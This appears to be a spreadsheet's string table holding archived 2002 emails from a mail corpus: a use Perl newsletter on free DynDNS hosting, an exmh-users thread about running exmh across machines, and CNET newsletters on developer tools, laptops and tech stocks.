  <si>
    <t>http://www.gerg.ca</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 11 Sep 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-11</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * DynDNS.org Offers Free DNS To Perl Sites\n\n+--------------------------------------------------------------------+\n| DynDNS.org Offers Free DNS To Perl Sites                           |\n|   posted by KM on Tuesday September 10, @08:23 (news)              |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]krellis writes "[0]DynDNS.org today [1]announced that it will provide\nfree premium DNS services (primary and secondary DNS hosting) to any\ndomains involved in the Perl Community. Read the press release for full\ndetails, [2]create an account, and [3]request credit under the Perl DNS\noffer! Never lose traffic to your Perl site due to failed DNS again!"\nSweet. Thanks.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.dyndns.org[/URL]\n    1. [URL]http://www.dyndns.org[/URL]\n    2. [URL]https://members.dyndns.org[/URL]\n    3. [URL]https://members.dyndns.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dyndns.org http://www.dyndns.org https://members.dyndns.org https://members.dyndns.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 11 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-11</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nDynDNS.org Offers Free DNS To Perl Sites\n    posted by KM on Tuesday September 10, @08:23 (new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exmh-users@spamassassin.taint.org\nFrom: Robert Waldner &lt;waldner@waldner.priv.at&gt;\nDate: Wed, 11 Sep 2002 01:24:46 +0200</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 01:24:46 +0200</t>
  </si>
  <si>
    <t>Robert Waldner &lt;waldner@waldner.priv.at&gt;</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\nIt has been signed conforming to RFC2015.\nYou'll need PGP or GPG to check the signature.\n\n------------=_1031700302-417-36\nContent-Type: text/plain; charset=us-ascii\n\n\nOn Tue, 10 Sep 2002 09:27:12 PDT, J C Lawrence writes:\n&gt;I run exmh on my desktops at home and at work with the resulting\n&gt;exmh windows being displayed on both my work and home desktops (gratis\n&gt;SSH X11 forwarding).  In fact, your message was read and replied to\n&gt;(this message) while at work, using an exmh instance running on my home\n&gt;machine.\n\nSo you have 4 copies (1+1 per desktop) of exmh running?\n\nThat's what I usually do, but what I'd really like would be some \n automagism to tell them "Flist", "Rescan Folder", which I now do \n manually whenever I'm going to work at the "other" machine.\n\ncheers,\n&amp;rw\n-- \n-- In the first place, God made idiots;\n-- though this was for practice only;\n-- then he made users. (Mark Twain, modified)\n\n\n\n------------=_1031700302-417-36\nContent-Type: application/pgp-signature; name="signature.ng"\nContent-Disposition: inline; filename="signature.ng"\nContent-Transfer-Encoding: 7bit\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9fn9OE0NzSJr53oIRAkEtAJwLbcoH2lx/CnhG/eQN1mJMDqnO7wCeLrKo\nwFXc+1hVHd8T3cQZbbOYeUk=\n=40Qu\n-----END PGP SIGNATURE-----\n\n------------=_1031700302-417-36--\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Wed, 11 Sep 2002 00:55:08 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 00:55:08 -0700</t>
  </si>
  <si>
    <t>On Wed, 11 Sep 2002 01:24:46 +0200  Robert Waldner  wrote: &gt; On Tue, 10 Sep 2002 09:27:12 PDT, J C Lawrence writes: &gt;&gt; I run exmh on my desktops at home and at work with the resulting exmh &gt;&gt; windows being displayed on both my work and home desktops (gratis SSH &gt;&gt; X11 forwarding).  In fact, your message was read and replied to (this &gt;&gt; message) while at work, using an exmh instance running on my home &gt;&gt; machine. &gt; So you have 4 copies (1+1 per desktop) of exmh running? Yes. One of the nicer aspects of exmh's colour handling is that while I have the default background for the message pane set to black, the second insance of exmh displaying to a given $DISPLAY will set the background of the message pane to darkslategray.  Very nice as it provides an instant visual cue as to which is which.  (No: I've not checked where it gets that colour selection from). &gt; That's what I usually do, but what I'd really like would be some &gt; automagism to tell them "Flist", "Rescan Folder", which I now do &gt; manually whenever I'm going to work at the "other" machine. --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.kanga.nu https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: "CNET: Tools for Software Developers" &lt;Online#3.19703.9d-Vzezlg_fmMczm9RR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 16:34:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 16:34:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET: Tools for Software Developers" &lt;Online#3.19703.9d-Vzezlg_fmMczm9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This Week: FileSystem, AppletFile, PHP Master Editor</t>
  </si>
  <si>
    <t>![Download Dispatch - Tools\n\nfor Software\nDevelopers]([URL]http://download.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n**ActiveX controls  \n** We've selected our top programs that handle transparent GIF files, offer\nprebuilt ActiveX controls, and edit hex code to get you up and running.  \n\n![Software Updates]([URL]http://www.cnet.com[/URL]  \n**Anfy Java 2.0**  \nApply magical effects to your Web-bound images.\n\n**ActiveFile 2.3**  \nAdd file-handling capabilities to your Active Server Pages.\n\n**UltraEdit-32 9.1**  \nEdit text, HTML, or hex code, with a comprehensive support for a programmer's\nneeds.\n\n**SQL*Lite 2.6**  \nRun up to five simultaneous SQL queries with this tool for Oracle and MySQL.\n\n![Software\n\nUpgrades]([URL]http://a.r.tv.com[/URL]  \n| **Software Upgrades:**  \n  \n---  \n**  1.** |  ZoneAlarm Pro 3.0  \n**  2.** |  Norton AntiVirus 2002  \n**  3.** |  AdSubtract Pro 2.5  \n**  4.** |  Microsoft Windows XP - Professional  \n**  5.** |  Nero Burning ROM 5.5  \n**  6.** |  Reason 2.0  \n**  7.** |  Microsoft Windows XP - Home Edition  \n**  8.** |  QuickBooks Pro 2002  \n**  9.** |  Adobe Photoshop 7.0  \n**10.** |  WinZip 8.1  \n  \nFind a complete list of the 50 most popular software products at **CNET\nShopper.com**.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |  July 10,\n2002\n\n**Greetings from Download.com!**\n\nIf you're developing Windows applications in an ActiveX-compatible environment\n(which includes most major ones such as Visual Basic and C++), it's time you\nstarted taking advantage of prefab programming components. An amazing array of\ncontrols are out there, with more arriving at Download.com every day. This\nweek, we've collected the top programs that handle transparent GIF files,\noffer prebuilt ActiveX controls, and edit hex code to get you up and running.\n\nAlso this week, we've got two really useful ActiveX entries: FileSystem 1.2\nand AppSecureX 2.9. FileSystem gives you access to drives, folders, and I/O\noperations; and AppSecureX adds serial number and shareware-type functionality\nto your applications.\n\nBecky Waring  \nContributing Editor, CNET Download.com\n\n| ![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---  \n![Reviews &amp; Features]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nFrom Builder.com  \n**Six MySQL/PHP functions to streamline development**  \nCode reuse is one of the keys to increasing developer productivity. This\narticle looks at several handy functions you can use to save time when\nbuilding applications using PHP and MySQL.  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Faking SOAP principles with familiar techniques**  \nSOAP is everywhere you turn. But what exactly is it? Take this guided tour to\ngain working knowledge of this emerging standard.\n\n![Picks of the week]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nin ActiveX  \n**FileSystem 1.2**  \nHaving problems wrangling the Windows File System? The FileSystem ActiveX\ncontrol offers complete access to common file information under Windows\nthrough three independent interfaces. Everything from drive and folder access\nto file I/O operations is available with only a few lines of code. Use this\ncontrol's interfaces to detect media types and media insertion, get complete\nlists of folders and files at unlimited folder depth, find out what attributes\nare set on files, and even load logbook files into collections automatically.\nRope in your files.\n\n**ApSecureX 2.9**  \nPrevent pirates from copying your software with AppSecureX. This control\nprovides a registration system that produces a valid serial number customized\nto the user's machine. When the user installs your software, a unique ID\nnumber is generated for that system. To get the serial number, the user must\nprovide you with his installation number. The data file created by the\napplication is encrypted differently for each system, so even if someone were\nto crack the file, they couldn't use the information on another machine.\nAppSecure can also give your software shareware functionality such as number\nof days left, checking to see if the system clock is set back, and so on.\nAppSecureX works with any ActiveX-enabled programming language such as\nMicrosoft Visual Basic or Microsoft Visual C++. A demo application is\nincluded. Lock up your software.\n\nin Java  \n**AppletFile 2.5**  \nAppletFile is a set of Java applets that will enhance your Web site's file\nupload and download capabilities. In addition to support for SSL, proxy, and\nauthenticated uploading, users can upload and download multiple files using\npredefined paths to automate the process as much as possible. A scripting\nlanguage provides for sophisticated customization, and the user interface\nincludes support for 12 different languages. Transfers are faster because the\napplet uses its own compression (AutoZIP). The AutoSYNC feature downloads only\nupdated files, and verification of file transfer integrity is made possible\nwith built-in support for MD5 message digests. AppletFile is based on HTTP\nprotocols and is firewall-friendly. This update adds Sun's Java Plug-in\nsupport for Netscape 6+ browsers and shows removable media drives in the\nbrowse dialog. Beam up your files.\n\nin Tools &amp; Editors  \n**PHP Master Editor 2.0**  \nWrite, edit, and debug PHP scripts and HTML pages with this tool. PHP Master\nEditor includes an internal browser for viewing, as well as a debugger for\nlocal testing. Basic FTP capability is also included. Specifically designed\nfor PHP programmers, the program recognizes and formats functions, variables,\nand classes within the code, and features customizable code templates. Get\ncode-happy.\n\n![This Week's Top Ten Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n|   | **Most Popular Titles**  \nWeek ending July 7  |    **Last  \n  Week**  |    **Weeks  \n  on Chart**  |    **Downloads  \n  This Week**  \n---|---|---|---|---  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n1 | **Microsoft Java Virtual Machine **|  4 |  83 |  12,047  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n2 | **Microsoft Windows Installer (95/98/Me) ** |  1|  83|  10,817  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n3 | **Microsoft Data Access Components RTM** |  3 |  83 |  9,911  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n4 | **Java 2 Runtime Environment, SE ** |  2 |  83 |  9,685  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n5 | **Visual Basic 6.0 Runtime Module SP5 **|  5 |  72 |  8,243  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n6 | **ActiveX Control Pad ** |  8 |  6 |  3,740  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n7 | **Mozilla (32-bit) ** |  7|  4|  3,071  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n8 | **Microsoft Windows Installer (Windows NT/2000)** |  9 |  36 |  2,411  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n9 | **Borland C++ Compiler** |  10 |  59 |  2,356  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n10 | **Java 2 Development Kit** |  14 |  83 |  2,144  \n| ![]([URL]http://www.cnet.com[/URL]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16&amp;ISSUE=2002-07-10)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://download.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://www.cnet.com http://a.r.tv.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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cnet-newsletters@example.com\nFrom: CNET Hardware Newsletter &lt;Online#3.19700.89-xNOclp13QVGIDsRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 15:43:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 15:43:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Hardware Newsletter &lt;Online#3.19700.89-xNOclp13QVGIDsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>IBM's thin ThinkPads fit to a T</t>
  </si>
  <si>
    <t>![CNET Computers.com\nNewsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n  \n![Editors' Choice]([URL]http://www.cnet.com[/URL]  \n|  Samsung ML-1430 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Hardware  \n---  \nUnitech 2U4U DMR-300 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nVideo Explosion Deluxe ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Software  \nSony Ericsson T68 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Wireless  \n  \n  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nComputers All CNET The Web  \n---  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  |  ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] 10, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n\--Tom Dunlap  \nSenior editor  \nCNET Hardware  \n|  |  **Dear Readers,**  \nHey, it's not all bad news in the corporate world. One definite business\nsuccess story is Big Blue's ThinkPad T series. These versatile and speedy\nthin-and-light notebooks share a sturdy, well-designed black case and come in\nso many configurations that you can find one that's right for just about any\nuse. They also range in price from $2,199 to a hefty $3,499. For a\ncomprehensive look at this line of notebooks, check out our verdict.  \n**Read the review**  |  **Check latest prices**  \n  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n|  ![advertisement]([URL]http://home.cnet.com[/URL]  \n---  \n**click here for details**  \n  \n|  |  |  \n  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Intel's new insides**  \nThe i845 chipset's many flavors are faster, better, and a lot more confusing.\nRead before you shop.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Gateway 300 series keeps PCs simple  \nÂ• Modernize your motherboard  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n**Desktops**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Gateway 700XL  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Dell Dimension 4000 series  \n![]([URL]http://home.cnet.com[/URL]  \n3\. HP Pavilion 950  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Alienware Aurora DDR  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Falcon Northwest Mach V  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ndesktops**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![Reviews]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**IBM's thin ThinkPads fit to a T**  \nThe ThinkPad T-series notebooks are fast, and they offer a great design,\ninnovative features, and good support. For a comprehensive look at this line\nof notebooks, check out our verdict.  \n**Read the review**  |  **Check latest prices**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Inside the Labs: The PC of the future, part two**  \nMira, a flat-panel display that wirelessly connects to a PC, will let you take\nyour system anywhere in your house--or so Microsoft promises. This is just one\nof the coming-soon-to-a-living room-near -you technologies that Microsoft\npromoted at its annual hardware summit. Labs Manager Daniel A. Begun has the\nscoop on the next batch of Microsoft-promoted technologies that could change\nthe way consumers use their PCs.  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Gateway 300 series keeps PCs simple**  \nGateway's most basic desktop line offers some good values for students and\nfamilies buying second computers for their children-- if you configure\ncarefully. But if you're eyeing the fancy LCD and DVD-ROM drive options, get a\nfancier PC to go with them. Find out why in our review.  \n**Read the review**  |  **Configure &amp; price**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Midrange iBuyPower PC suffers from low-end blues**  \nThe generic iBuyPower Argous has some nice features, but it lacks the\nperformance, the support, and the finishing touches delivered by similarly\npriced competitors. Read our review to find out where it falls short--and\nwhich systems in this price range present better alternatives.  \n**Read the review**  |  **Check latest prices**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Add wireless networking for $200 or less**  \nWi-Fi (802.11b) access points provide the cheapest, easiest way to extend your\nwired or wireless network to the far-flung reaches of your home or office.\nCheck our reviews of access points from Agere Systems, Belkin, and D-Link to\nsee which is the cheapest, which has the best security, and more.  \n**Read the review**  \n  \n\n|  ![Whats New?]([URL]http://a.r.tv.com[/URL]  \n| **the hottest products this week**  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**Cendyne 48X/12X/48X EIDE**  |  **Check latest prices**  \n95ms access time; 2MB cache\n\n**IBM ThinkPad R32**  |  **Check latest prices**  \nPentium 4-M-1.8GHz; 256MB RAM; 30GB hard drive\n\n**Toshiba Satellite 5105-S502**  |  **Check latest prices**  \nP4-1.7GHz; 512MB RAM; 40GB hard drive\n\n**Sony GDM FW900**  |  **Check latest prices**  \n24 inches of new viewing bliss; built-in USB hub\n\n![User reviews]([URL]http://a.r.tv.com[/URL]  \n| **Overheard on Computers.com**  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n"Simply wow!"  \n"Now this is an awesome machine"  \n"Slick, spartan design--raw power"  \n"Powerful, solid, and durable"  \n"Love it--oh, what a programmer's keyboard!"  \n"Best of the best"  \n"Reliably fast with beautiful screen"\n\nClick here to find out what this mystery product is.  \n**Read the review** |  **Check latest prices**\n\nClick here to see more of CNET's User Opinions.\n\n![CNET Message Boards]([URL]http://a.r.tv.com[/URL]  \n| ****  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**CNET Message Boards: Computer Help is here**  \nStumped by computer hardware and software problems? Never fear; check out the\nCNET Message Boards, where quick help is just a post away. Join us in the\nComputer Help forums.\n\n![]([URL]http://www.cnet.com[/URL]\n![]([URL]http://www.cnet.com[/URL]  \n**\n\n  * Live tech help: submit your questions now\n  * CNET News.com: Top CIOs on the future of IT\n  * Find a job you love, with more than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's HTS-910DV \n**  \n---  \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Change e-mail format |  Change e-mail address|  FAQ |\nAdvertise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05&amp;ISSUE=2002-07-10)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.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a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.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zdnet@example.com\nFrom: "CNET News.com Investor" &lt;Online#3.19692.cd-kEiTl7czTUOatRRR.1@newsletter.online.com&gt;\nDate: Wed, 10 Jul 2002 14:40:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 10 Jul 2002 14:40:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Investor" &lt;Online#3.19692.cd-kEiTl7czTUOatRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>NEWS.COM INVESTOR: Tech stocks drop again on Qwest criminal probe news</t>
  </si>
  <si>
    <t>\n\n![CNET Investor Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  |  **Quote Lookup**  \nEnter symbol:  \n  \n* Symbol Lookup  \nQuotes delayed 20+ minutes  \n---  \n  \n![Investor Sections]([URL]http://www.cnet.com[/URL]  \nÂ• **My Portfolio**  \nÂ• **Broker Reports**  \nÂ• **IPOs**  \nÂ• **Splits**  \nÂ• **Messages**\n\n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nJuly 10, 2002  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] DJIA  \n8813.50  -282.59 | ![]([URL]http://home.cnet.com[/URL]\nNASDAQ  \n1346.01  -35.11 | ![]([URL]http://home.cnet.com[/URL]\nS&amp;P; 500  \n920.47  -32.36 | ![]([URL]http://home.cnet.com[/URL] CNET\nTECH  \n965.29  -26.23  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**CNET News.com Vision Series**  \nRead News.com's exclusive interviews of 10 top CIOs.  \nVision Series home  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n**Tech stocks drop again on Qwest criminal probe news**  \nWord telecom Qwest Communications International is being investigated by the\nU.S. Attorney's office in Denver helped send technology shares lower\nWednesday.\n\nDespite a Merrill Lynch upgrade of Cisco Systems and the fact that J.P. Morgan\nbegan coverage on AOL Time Warner with a "buy" rating, CNET's Tech index fell\n26.23 points, or 2.66 percent, to 965.29. The tech-heavy Nasdaq composite\nindex lost 35.11 points, or 2.54 percent, to 1,346.01--a multi-year low.\n\nBroader markets also shed value, dragged down in part by a troubled\npharmaceutical sector. The Dow Jones industrial average dropped 282.5 points,\nor 3.11 percent, to 8,813.5, and the S&amp;P; 500 slid 32.36 points, or 3.52\npercent, to 920.47--also a multi-year low.  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![Top Investor News]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**AT&amp;T;, Comcast Shareholders OK Broadband Deal **  \nShareholders of AT&amp;T; Corp. and Comcast Corp. on Wednesday approved the\nplanned $27 billion merger of AT&amp;T; Broadband with Comcast, which will create\nthe nation's largest cable TV operator with more than 22 million customers.\nTelephone giant AT&amp;T; in December agreed to sell its cable television unit to\nComcast as part of a restructuring that dismantled its vision of becoming a\none-stop shop for telephone, data and video services.  \n **AT &amp;T; CORP 9.78 -2.30% **\n\n**$215 million later, start-up Pluris shuts down**  \nNetworking start-up Pluris will release a statement Wednesday announcing it\nhas closed its doors because of a lack of funding and ongoing woes in the\nmarket it serves, according to a spokeswoman familiar with the company's\nplans. Pluris, a once promising company, burned through $215 million over the\npast few years as it attempted to build a high-end router that was intended to\noutclass similar products from competitors such as Juniper Networks and Cisco\nSystems.  \n **CISCO SYSTEMS 13.51 2.82%**\n\n**WorldCom contracts under U.S. scrutiny**  \nThe accounting scandal at WorldCom has prompted U.S. government agencies to\nscrutinize the telecommunications company's billions of dollars in federal\ncontracts. The Federal Aviation Administration, for one, has been forced to\ntake stock of the situation quickly. WorldCom is a finalist for a 20-year,\n$3.5 billion contract with the FAA. The contract is expected to be awarded as\nsoon as this week. The company is the incumbent on the contract, which\nsupplies phone and data infrastructure to the nation's air traffic control\nsystems.  \n **WORLDCOM INC-WORLDCOM TRCK STK 0.20 -3.81%**\n\n**Also from CNET**  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!\n\n![Today's Broker Reports]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Banc of America Securities lowers estimates and price target on IBM in notes\n7/10/02**  \nAnalyst Joel Wagonfeld argues the computer giant is not immune to the\npersistent, widespread weakness in IT spending. But a roughly 6 percent dip in\nrevenues during the second quarter will be offset by the elimination of losses\nfrom the discontinued hard disk drive business, Wagonfeld predicts. In IBM's\nsecond-quarter results, he expects continued weakness in hardware but relative\nstrength in software and outsourcing. The company's decision to exit or\nrestructure unprofitable, commodity businesses is sound, Wagonfeld says. He\nreiterates a "buy" rating on IBM.  \n **INTL BUSINESS MACHINES 68.76 -1.31%**  \nVisit the Brokerage Center\n\n![CEO Wealth Meter]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Pressplay CEO Schuon to leave company**  \nAndy Schuon is leaving as president and chief executive officer of Pressplay,\na joint online venture between Sony Music and Universal Music, sources close\nto the matter said on Wednesday. Sony Music is a unit of Sony Corp, and\nUniversal Music is a unit of Vivendi Universal.  \n **SONY CORP ADR 50.47 -4.32%**  \nVisit the CEO Wealth Meter  \n\n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Crucial 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URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  